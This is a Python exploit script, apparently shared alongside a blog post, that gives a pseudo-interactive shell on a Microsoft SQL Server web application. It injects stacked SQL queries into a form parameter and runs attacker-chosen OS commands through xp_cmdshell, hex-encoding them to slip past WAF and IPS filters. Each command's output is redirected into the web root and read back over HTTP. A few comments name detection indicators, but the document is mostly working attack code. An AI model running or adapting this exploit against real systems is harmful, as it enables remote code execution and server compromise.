Execute command using HEX or CHAR encoding. Bypass WAF and IPS filtering enabling RCE using xp_cmdshell: https://knifesec.com/evading-sql-injection-filters-to-get-rce/
#!/usr/bin/env python3
# Injector script to get a pseudo-interactive shell using xp_cmdshell
# Source post:
# Author: notdodo
# https://twitter.com/_d_0_d_o_
#
# USAGE: python3 ./mashell.py "whoami /priv"
#
import binascii
import hashlib
import requests
import sys
# Target locations. BASE_URL is a placeholder host; INJECTION_PATH is the
# endpoint the payload is posted to, and OUTPUT_PATH is where the redirected
# command output is later fetched from.
BASE_URL = "http://targeturl.tar/"
INJECTION_PATH = "{}update.cfm".format(BASE_URL)
# md5 only derives a file name here; it is not used as a security primitive.
OUTPUT_FILE = "{}.txt".format(hashlib.md5(b"pwned").hexdigest())
# Filesystem directory under the target's web root that the command output is
# redirected into (see the "> ..." redirection appended to the command below).
WEB_ROOT = "C:\\webroot\\webapplication\\library\\"
OUTPUT_PATH = "{}{}".format(BASE_URL, OUTPUT_FILE)
# Encode a command as a T-SQL char() concatenation,
# e.g. "dir" -> char(100)+char(105)+char(114)
def encode_char(command):
    """Return *command* as a ``char(n)+char(n)+...`` T-SQL expression.

    Every character becomes ``char(<ordinal>)`` and the pieces are joined
    with ``+``; an empty command yields an empty string.  On the defensive
    side, a run of ``char(`` calls joined by ``+`` inside a request parameter
    is a high-signal string to alert on.
    """
    pieces = ["char({})".format(ord(ch)) for ch in command]
    return "+".join(pieces)
def encode_hex(command):
    """Return the UTF-8 bytes of *command* as a lowercase hex string.

    No ``0x`` prefix is added and an empty command yields an empty string;
    the result equals ``binascii.hexlify(command.encode()).decode()``.  A
    long bare hex literal arriving in a request parameter is, for the same
    reason, worth flagging on the defensive side.
    """
    return "".join("{:02x}".format(byte) for byte in command.encode())
# Injection payload: the "oid" parameter carries a T-SQL batch that recreates
# a scratch table and stores xp_cmdshell output in it; the "{}" placeholder is
# filled with the encoded command further down.
# NOTE(review): from the defensive side, "xp_cmdshell", "drop table"/"create
# table" and a long hex literal arriving together in one request parameter
# are high-signal indicators of this pattern.
injection_payload = {
    "oid": "\n".join([
        "1;",
        "drop table temptable;",
        "create table temptable (output ntext null);",
        "declare @t nvarchar(4000) set @t={}",
        "insert into temptable(output) EXEC master..xp_cmdshell @t",
    ]),
    "retrieval": "Invia",
}
# Second payload: a sub-select that converts the stored command output to int.
# It is sent as the body of the GET below.
check_payload = {
    "Cancel": "Annulla",
    "oid": "(select convert(int, cast((SELECT TOP 1 output FROM temptable) as ntext)) from syscolumns)",
}
# The command comes from argv; its stdout is redirected into a file under the
# web root so it can be fetched over HTTP afterwards.
command = " ".join(sys.argv[1:])
command = "{} > {}{}".format(command, WEB_ROOT, OUTPUT_FILE)
# Substitute the hex-encoded command into the batch template.
injection_payload["oid"] = injection_payload["oid"].format(encode_hex(command))
# Send the injection, then fetch the redirected output file and print its body.
r = requests.post(INJECTION_PATH, data=injection_payload, timeout=30)
r = requests.get(OUTPUT_PATH, data=check_payload, timeout=5)
print(r.text)